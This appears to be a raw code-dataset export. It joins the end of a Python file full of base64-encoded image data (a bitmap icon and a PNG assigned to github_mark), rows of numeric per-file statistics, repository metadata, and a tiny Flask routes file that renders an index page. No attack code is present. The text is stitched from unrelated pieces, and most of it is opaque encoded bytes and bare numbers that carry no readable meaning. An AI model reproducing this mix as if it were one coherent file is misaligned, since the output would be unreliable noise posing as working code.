bANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8
A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAdXJxAIuJiCpqZ2fMIyAf/yMcGv9XREH/dFpX/2tST/9ZQD3/TjUz/0szMf9IMjH/RTEv/0IuLf8+Kyv/Oigp/zYmJ/8zJCX/MCEk/ywfIf8pHSD/KR0g/ykdIP8oHSD/KB0g/ygdIP8oHSD/Jx0g/ycdIP8nHSD/Jx0f/ycdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8lHR//JR0f/yUdH/8lHR//JR0f/yUdH/8lHR//JB0f/yQdH/8mHyH/Jh8h/yYdIf8jHx7/FxcU/xUWEv9eYF3ncXJwR0lKRwI7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMbExADIxsYApKGhAHl1dQByb24Ai4iIALi2tihubGuRHRoZ9xgUE/9BNDP/aVNQ/25WU/9cRUT/TTU0/0UwLv9DLi3/QS0t/z0rKv85KCn/NiYn/zMjJf8vISP/Kx8h/ykdIP8pHSD/KR0g/ygdIP8oHSD/KB0g/ygdIP8nHSD/Jx0g/ycdIP8nHSD/Jx0f/yYdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yUdH/8lHR//JR0f/yUdH/8lHR//JR0f/yQdH/8lHiD/JyAi/yYfIf8lHiD/IR0e/xESD/8SFA//XF1bs4+QjTJyc3ECR0hFADs8OABSVFEAdHRyAMzMywDd3d0A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAeXV1AHJvbgCIhYUAwL6/AHBtbA1ua2t3R0VF8xQREP8qIiH/VERC/2lVVP9jTk3/UD08/0MvLv8+KSn/Oykp/zgnKP81JSb/MiMl/y8gI/8rHiH/KR0g/ykdIP8oHSD/KB0g/ygdIP8oHSD/KB0g/ycdIP8nHSD/Jx0g/ycdIP8nHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yUdH/8lHR//JR0f/yUdH/8lHR//Jh8h/yggIv8nHyH/JB4f/xoaGP8KDAj/Ozs5/21ua4+Cg4EbjY6LAHBxbwBHSEUAOzw4AFJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8
A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAcm9uAIiFhQC/vb4AbWppAHNxcAl/fHwvYF1dvyonJ/8ZFRT/Ny0s/1hIR/9iUE7/V0ZF/0g1Nf87KSr/NiQl/zMjJf8xIiT/LiAi/yoeIf8pHSD/KR0g/ygdIP8oHSD/KB0g/ygdIP8oHSD/Jx0g/ycdIP8nHSD/Jx0g/ycdH/8nHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8mHR//JR0f/yUdH/8mHiD/KCAi/ykgI/8pHyL/Jh8g/x0bGv8UFhL/Gx4Z/0xOSuCJiYhRiYmIC4KDgQCMjYoAcHFvAEdIRQA7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMbExADIxsYApKGhAHl1dQByb24AiIWFAL+9vgBtamkAcW9uAH98ewCPjIsQX1xcUzYzMt0cGRj/GxcV/zkwLv9SREL/WEdH/1E/QP9DMzT/Nycp/y8hIv8rHR//KBwf/ygcH/8pHSD/KB0g/ygdIP8oHSD/KB0g/ygdIP8nHSD/Jx0g/ycdIP8nHSD/Jx0g/ycdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8nHyH/KSEj/ykhI/8pHyL/Jh8g/x8dG/8TFRH/FhkU/y8xLeRWV1RxbW9sHo2NjAOJiYgAgYKAAIyNigBwcW8AR0hFADs8OABSVFEAdHRyAMzMywDd3d0A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAeXV1AHJvbgCIhYUAv72+AG1qaQBxb24Afnt6AJGOjQBdWlkDcm5uKnx6eZJHRkTzHBgX/xwXFv8yKyr/Rjo6/01AQP9KPD3/QTM1/zcqLP8uIib/Kh4h/ygdIP8nGx7/Jxwf/yccH/8nHB//Jxwf/yccH/8mHB//Jxwf/yYcH/8mHB//Jxwf/ycdH/8mHR//Jx4g/ygfIf8pICL/KiAj/yohI/8pHyP/JB4f/yAcG/8WFhL/EhMP/y4xLP93eHawY2RiM1NUUQZucG0AjIyLAImJiACBgoAAjI2KAHBxbwBHSEUAOzw4AFJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29s
A29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAcm9uAIiFhQC/vb4AbWppAHFvbgB+e3oAkY6NAFxZWAB2cnIAfnx7CI6NjC1+fHuVR0VD5CIgHv8XFRL/JSEf/zIrK/89MzP/PzQ2/z4yNv88MTT/OCww/zMpLP8xJin/LyQn/y0iJf8sIST/KyEk/yogI/8rICP/KiAk/yshJP8rIiX/LCIk/ywjJf8rIiT/KiEj/yogIv8mHiH/IRwc/xoZFv8VFhL/FxgU/zg5Nfpqamixfn58OZSWlApkZWIBUlNQAG5wbQCMjIsAiYmIAIGCgACMjYoAcHFvAEdIRQA7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMbExADIxsYApKGhAHl1dQByb24AiIWFAL+9vgBtamkAcW9uAH57egCRjo0AXFlYAHZycgB9e3oAkpGQAIOBgAdraWgMYF5dW2FeXdEwLiz6JSIg/xwbGf8gHRv/KSUk/y0nJ/80Ky3/Ny4w/zguMP82LTD/Niwv/zUrLv80Ki3/Myks/zEoK/8wJyr/LyYp/ywjJ/8qIST/KB8h/yMdHP8fGxn/GhkW/xQVEf8aGhb/KSon/1BRTtZSU1B3ZGViHoiJhwl/gH4BlZeVAGNkYQBSU1AAbnBtAIyMiwCJiYgAgYKAAIyNigBwcW8AR0hFADs8OABSVFEAdHRyAMzMywDd3d0A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAeXV1AHJvbgCIhYUAv72+AG1qaQBxb24Afnt6AJGOjQBcWVgAdnJyAH17egCSkZAAgoB/AG1ragBfXVwCkpCPCXVzcTJwb25xOTg2n0A+PechHx35JiQi/yEeHP8XFBL/GBYU/x8cG/8kIB//JSEg/yUgIP8lICD/JB8f/yIfHv8fHBr/GBgW/xMUEP8VFhL/IiIf/yEjHv4vMCz4UVJQ1F5eXI1ucG1CZmdlCFFSTwRmZ2QAiYqIAH5/fQCVl5UAY2RhAFJTUABucG0AjIyLAImJiACBgoAAjI2KAHBxbwBHSEUAOzw4AFJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29s
A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAcm9uAIiFhQC/vb4AbWppAHFvbgB+e3oAkY6NAFxZWAB2cnIAfXt6AJKRkACCgH8AbWtqAF9dXACTkZAAd3V0AXNycQI5ODcDXFtaDE1LSjF8fHp2LCooeWJgX9VZWFbpOjo36CEgHegcGxjoHR0Z6B0dGegcHRnoGxwZ6CcoJehGRkPpYGBe509PTLlJSUZxhoeEY2BiXh9vcG0GXF1aAnFycAFmZ2UAUVJPAGZnZACJiogAfn99AJWXlQBjZGEAUlNQAG5wbQCMjIsAiYmIAIGCgACMjYoAcHFvAEdIRQA7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////+AAAP////gAAD////////8AAAAH//+AAAAH///////8AAAAAD/gAAAAAf//////8AAAAAAAAAAAAAB//////+AAAAAAAAAAAAAAP//////AAAAAAAAAAAAAAB//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAB//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////wAAAAAAAAAAAAAAf/////8AAAAAAAAAAAAAAH//////AAAAAAAAAAAAAAB//////4AAAAAAAAAAAAAA///////AAAAAAAAAAAAAAf//////wAAAAAAAAAAAAAH///////AAAAAAAAAAA
AAH///////4AAAAAAAAAAAAD////////wAAAAAAAAAAAD////////4AAAAAAAAAAAAf///////8AAAAAAAAAAAAH///////+AAAAAAAAAAAAA/////+P/AAAAAAAAAAAAAH/j///B/gAAAAAAAAAAAAB/g///gH4AAAAAAAAAAAAAPwH//4A8AAAAAAAAAAAAAD4B//+APAAAAAAAAAAAAAA+AP//gBwAAAAAAAAAAAAAHAB//4AIAAAAAAAAAAAAABgAf/+AAAAAAAAAAAAAAAAIAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//wAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAP//wAAAAAAAAAAAAAAAAAH//+AAAAAAAAAAAAAAAAAB///AAAAAAAAAAAAAAAAAAf//4AAAAAAAAAAAAAAAAAP//+AAAAAAAAAAAAAAAAAD///wAAAAAAAAAAAAAAAAA///8AAAAAAAAAAAAAAAAAf///wAAAAAAAAAAAAAAAAH///8AAAAAAAAAAAAAAAAD////AAAAAAAAAAAAAAAAA////4AAAAAAAAAAAAAAAAf////AAAAAAAAAAAAAAAAP////wAAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAB/////wAAAAAAAAAAAAAAAf////+AAAAAAAAAAAAAAAP/////wAAAAAAAAAAAAAAH/////8AAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////8AAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAA//////wAAAAAAAAAAAAAAP/////+AAAAAAAAAAAAAAD//////gAAAAAAAAAAAAAA//////4AAAAAAAAAAAAAAf/////+AAAAAAAAAAAAAAH//////wAAAAAAAAAAAAAB//////+AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAf//////+AAAAAAAAAAAAAH///////AAAAAAAAAAAAAB///////wAAAAAAAAAAAAAf//////8AAAAAAAAAAAAAH///////AAAAAAAAAAAAAB///////wAAAAAAAAAAAAA///////+AAAAAAAAAAAAAH///////gAAAAAAAAAAAAB///////4AAAAAAAAAAAAA///////+AAAAAAAAAAAAAP///////gAAAAAAAAAAAAD///////8AAAAAAAAAAAAB////////AAAAAAAAAAAAAf///////wAAAAAAAAAAAAH///////+AAAAAAAAAAAAB////////gAAAAAAAAAAAA////////4AAAAAAAAAAAAP////////AAAAAAAAAAAAH////////wAAAAAAAAAAAB////////+AAAAAAAAAAAA/////////gAAAAAAAAAAAP////////8AAAAAAAAAAAH/////////AAAAAAAAAAAD/////////4AAAAAAAAAAA//////////AAAAAAAAAAAf/////////wAAAAAAAAAAP/////////+AAAAAAAAAAD//////////wAAAAAAAAAB//////////+AAAAAAAAAB///////////wAAAAAAAAA///////////+AAAAAAAAAP///////////wAAAAAAAAH///////////+AAA
AAAAAD////////////wAAAAAAAD////////////+AAAAAAAB/////////////4AAAAAAA//////////////AAAAAAA//////////////8AAAAAAf//////////////wAAAAAf///////////////AAAAA////////////////8AAAA/////////////////////////////8='''''
github_mark = '''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'''''
| 48,016.5
| 90,210
| 0.756125
| 11,107
| 96,033
| 6.537499
| 0.534438
| 0.03498
| 0.049
| 0.060596
| 0.167865
| 0.159684
| 0.149631
| 0.135005
| 0.127927
| 0.114513
| 0
| 0.124183
| 0.000052
| 96,033
| 2
| 90,211
| 48,016.5
| 0.631972
| 0
| 0
| 0
| 0
| 1
| 0.999604
| 0.999604
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
d9f8fde96d9d95889eac929780686cd8c4180411
| 165
|
py
|
Python
|
efecan/app/routes.py
|
ibrahimediz/flaskrest
|
e0d52d35dc5b3aff8a7a15832c84e1c3882c4f36
|
[
"MIT"
] | null | null | null |
efecan/app/routes.py
|
ibrahimediz/flaskrest
|
e0d52d35dc5b3aff8a7a15832c84e1c3882c4f36
|
[
"MIT"
] | null | null | null |
efecan/app/routes.py
|
ibrahimediz/flaskrest
|
e0d52d35dc5b3aff8a7a15832c84e1c3882c4f36
|
[
"MIT"
] | null | null | null |
from app import app
from flask import render_template
@app.route('/')
@app.route('/index')
def index():
return render_template("index.html",message = "Hellö")
| 18.333333
| 58
| 0.709091
| 23
| 165
| 5
| 0.565217
